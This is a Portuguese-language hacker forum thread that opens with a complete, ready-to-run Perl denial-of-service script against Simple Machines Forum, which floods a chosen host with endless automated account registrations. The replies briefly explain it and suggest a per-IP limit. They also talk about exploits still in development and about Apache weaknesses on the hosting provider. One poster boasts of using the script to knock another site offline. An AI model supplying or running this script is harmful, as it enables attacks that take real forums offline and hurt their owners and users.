Exploit para SMF, usa a técnica DoS. Normalmente usado para travamento do host.
#SMF DOS By Viran
#Attempts to Register Multiple Users on Desired SMF forum
#Works on Most Versions, cant tell you exact, did not experiment enough #to give affected versions.
use IO::Socket;
print "SMF Multiple User Registration DoS by viran\n\n";
print q(Enter a Host Name, ex www.host.com:
);
$host = <STDIN>;
chop ($host);
print q(Enter The Forum Directory ex /smf:
);
$dir = <STDIN>;
chop ($dir);
print q(Enter a Botname:
);
$bot = <STDIN>;
chop ($bot);
while($x != 999999999999999999999999999999999999)
{
$login ="$bot$x";
$email ="blank$x";
$sticky="user=$login&email=$email%40gg.com&passwrd1=password&passwrd2=password®agree=on®Submit=Register";
$lgth = length($sticky);
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
) or die "Could Not Open a Socket \n Check the Desired Host You Entered, it may be dosed";
print $sock "POST $dir/index.php?action=register2 HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Accept-Language: en-us,en;q=0.5\n";
print $sock "Accept-Encoding: gzip,deflate\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
print $sock "Keep-Alive: 300\n";
print $sock "Connection: keep-alive\n";
print $sock "Referer: http://www.$host/smf/index.php?PHPSESSID=95e0352c6697ffe00a2e829231320f3e&action=register\n";
print $sock "Cookie: PHPSESSID=95e0352c6697ffe00a2e829231320f3e\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: $lgth\n";
print $sock "$sticky\n";
close($sock);
print".";
$x++
}
Uma explicação básica cairia bem né?
O que esse exploit faz é simplesmente cadastrar vários user (999999999999999999999999999999999999 para ser mais exato).
Uma possível sol8ução é permitir que um IP cadastre somente um user por dia, ou algo assim.
HadeS
Sim.

Bom post!
Estou desenvolvendo um exploit para o SMF 1.1 RC2 e outras versões (Para falar a verdade está só nos papéis, mas não é coisa dificil, em breve estará pronto).
Ele se?a construído em C++.
E podem ficar tranqüilos, pois só vou disponibilizar depois de ter certeza que o Darkers não está vulnerável.
HadeS
Quote from: "HadeS"Estou desenvolvendo um exploit para o SMF 1.1 RC2 e outras versões (Para falar a verdade está só nos papéis, mas não é coisa dificil, em breve estará pronto).
Ele se?a construído em C++.
E podem ficar tranqüilos, pois só vou disponibilizar depois de ter certeza que o Darkers não está vulnerável.
HadeS
eu usei esse xpl soh q pra phpbb pra tirar do ar o site do spynet =P
ele ficou pputo
Quote from: "HadeS"Estou desenvolvendo um exploit para o SMF 1.1 RC2 e outras versões (Para falar a verdade está só nos papéis, mas não é coisa dificil, em breve estará pronto).
Ele se?a construído em C++.
E podem ficar tranqüilos, pois só vou disponibilizar depois de ter certeza que o Darkers não está vulnerável.
HadeS
Ele nao esta vulneravel
Quote from: "Shady"Quote from: "HadeS"Estou desenvolvendo um exploit para o SMF 1.1 RC2 e outras versões (Para falar a verdade está só nos papéis, mas não é coisa dificil, em breve estará pronto).
Ele se?a construído em C++.
E podem ficar tranqüilos, pois só vou disponibilizar depois de ter certeza que o Darkers não está vulnerável.
HadeS
Ele nao esta vulneravel 
Shady Shady a maior falha de segurança eeh a sensação de segurança total
o mitnick flw algo +- assim =P
a acho q foi
"A maior vulnerabilidade é a sensação e ivulnerabilidade."
o Kra ainda nem fez o xpl tu jah fala q nao tah buged
Acredite slul, o forum com certeza tem vulnerabilidades, assim como qualquer sistema.
Mas esse exploit nao funciona no Darkers (nem nenhum outro documentado ate o momento).
Legal!!!
Shady, disse que estou desenvolvendo o exploit, como diz que não está vulnerável?
Até onde sei está sim.
HadeS
Eu ja testei esse exploit no Darkers. Como eu pensava, nao funcionou.
Quote from: "Shady"Eu ja testei esse exploit no Darkers. Como eu pensava, nao funcionou.
mas shady!
ele nao estah falando do xpl postado ele estah falando de um que estah desenvolvendo como vc testou se ele ainda tah criando?
loki!
=P
inteh
He he he...
Acho que ouve uma falha na comunicação aqui.
Acontece.
Quote from: "slul"Quote from: "Shady"Eu ja testei esse exploit no Darkers. Como eu pensava, nao funcionou.
mas shady!
ele nao estah falando do xpl postado ele estah falando de um que estah desenvolvendo como vc testou se ele ainda tah criando?
loki!
=P
inteh
Sim, achei que estivesse falando do exploit que foi postado aqui.
Ao mesmo tempo, se a falha explorada pelo exploit que esta sendo codado pelo HadeS e a falha causada pela confianca que o SMF tem na variavel global de ip remoto do php, tambem nao vai funcionar. Essa falha seria usada para passar por bans, atraves da modificacao de headers, mas ja foi corrigida.
A nao ser que seja outra, ainda nao documentada
Se tiver algum bug no darkers,provavelmente no servidor apache !!
:. By ZeuS .:
Sim Shady!
É uma outra falha, ainda não documentada. Pelo menos nunca ví nenhum exploit ou texto sobre a mesma rodando pela internet.
Em breve eu posto. Ando sem muito tempo para codar.
HadeS
Quote from: "Zeus"Se tiver algum bug no darkers,provavelmente no servidor apache !!
:. By ZeuS .:
pouco provável a mindnet eh um servidor bem profissional...
ainda se fosse um servidor montado pelo administradores..( sem querer ofender ngm mas eles sao profissionais e vcs nao =/)
daí sim poderia haver alguma falha claro q alguma falha deve ter como tem no invasao que tbm eh hostado na mindnet mas eh mais dificil
O Apache da mindnet não é nenhuma maravilha não.
O Apache do Invasão, por exemplo, é bastante vulnerável, principalmente a DoS. E o Apache do Darkers não é muito atualizado. Seria bom o Admin dar um toque no pessoal da mindnet.
HadeS
Quote from: "HadeS"O Apache da mindnet não é nenhuma maravilha não.
O Apache do Invasão, por exemplo, é bastante vulnerável, principalmente a DoS. E o Apache do Darkers não é muito atualizado. Seria bom o Admin dar um toque no pessoal da mindnet.
HadeS
Poiseh eu jah dei toq no pessoal do invasao...
falei....
mandei e-mail
divulguei falhas...
mas v se alguem se preocupou
daí acontece aquele velho caso de invasao invadida e ngm sabe de nada =/
esse pessoal...
o ccoder sabe um bug no apache que possibilita ataques DoS mais ele não passa o código fonte do exploit que ele fez pra ngm ;//
eu sei que ele falou pro Shady que estava vuln...
agora não sei se é a mesma vuln que o HadeS quer criar o exploit
Não. O que o ccoder disse é pro Apache, o meu é pro SMF.
HadeS
Bom,
O N-Stealth acusou 8 possiveis falhas (//http://209.59.143.183/mailman/admin), mas nenhuma é verdadeira!!
Creio (alias tenho certeza), os admins tem a responsabilidade e capacidade nescessária para deixar o Darkers "blindado"
(......)
vlw!
E estamos fazendo o possivel